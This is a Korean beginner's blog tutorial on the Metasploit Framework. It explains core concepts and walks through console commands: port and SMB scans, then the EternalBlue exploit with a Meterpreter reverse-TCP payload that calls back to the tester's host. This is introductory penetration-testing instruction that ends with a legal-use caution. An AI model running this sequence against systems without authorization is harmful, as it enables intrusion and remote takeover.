Metasploit Framework(MSF) 기초

agnusdei·2025년 9월 17일

CTF

목록 보기
124/185

MSF 기본 개념

Metasploit Framework는 침투 테스트와 보안 평가를 위한 오픈소스 도구입니다. 주로 시스템의 취약점을 발견하고 테스트하는 데 사용되며, 보안 전문가들이 시스템의 보안 상태를 평가할 때 활용합니다.

핵심 구조

1. Exploit (익스플로잇)

  • 시스템의 취약점을 이용하는 코드
  • 특정 소프트웨어나 서비스의 버그를 공격

2. Payload (페이로드)

  • 익스플로잇이 성공한 후 실행되는 코드
  • 셸 액세스, 파일 다운로드 등의 작업 수행

3. Module (모듈)

  • Auxiliary: 스캔, 정보 수집 등 보조 기능
  • Encoders: 페이로드 인코딩
  • Evasion: 탐지 회피
  • Nops: 메모리 정렬용

일반적인 사용 순서

1단계: 정보 수집

use auxiliary/scanner/portscan/tcp
set RHOSTS [대상 IP]
set PORTS 1-1000
run

2단계: 취약점 스캔

use auxiliary/scanner/smb/smb_version
set RHOSTS [대상 IP]
run

3단계: 익스플로잇 선택

search [서비스명/취약점명]
use exploit/windows/smb/ms17_010_eternalblue

4단계: 페이로드 설정

set payload windows/x64/meterpreter/reverse_tcp
set LHOST [자신의 IP]
set LPORT [포트번호]

5단계: 대상 설정 및 실행

set RHOSTS [대상 IP]
check  # 취약점 확인
exploit

주요 명령어

  • help: 도움말 확인
  • search: 모듈 검색
  • use: 모듈 선택
  • show options: 설정 옵션 확인
  • set/unset: 값 설정/해제
  • run/exploit: 실행
  • back: 이전 단계로
  • sessions: 세션 관리

실제 워크플로우 예시

  1. 네트워크 스캔: 살아있는 호스트 확인
  2. 포트 스캔: 열린 포트 확인
  3. 서비스 확인: 각 포트의 서비스 버전 확인
  4. 취약점 검색: 해당 서비스의 알려진 취약점 확인
  5. 익스플로잇 실행: 적절한 익스플로잇과 페이로드 선택하여 실행
  6. 후속 작업: 획득한 액세스를 통해 추가 정보 수집

주의사항

MSF는 반드시 합법적인 목적으로만 사용해야 합니다:

  • 자신이 소유한 시스템 테스트
  • 명시적 허가를 받은 침투 테스트
  • 교육 목적의 실습 환경
profile
DevSecOps, Pentest, Cloud(OpenStack), Develop, Data Engineering, AI-Agent

0개의 댓글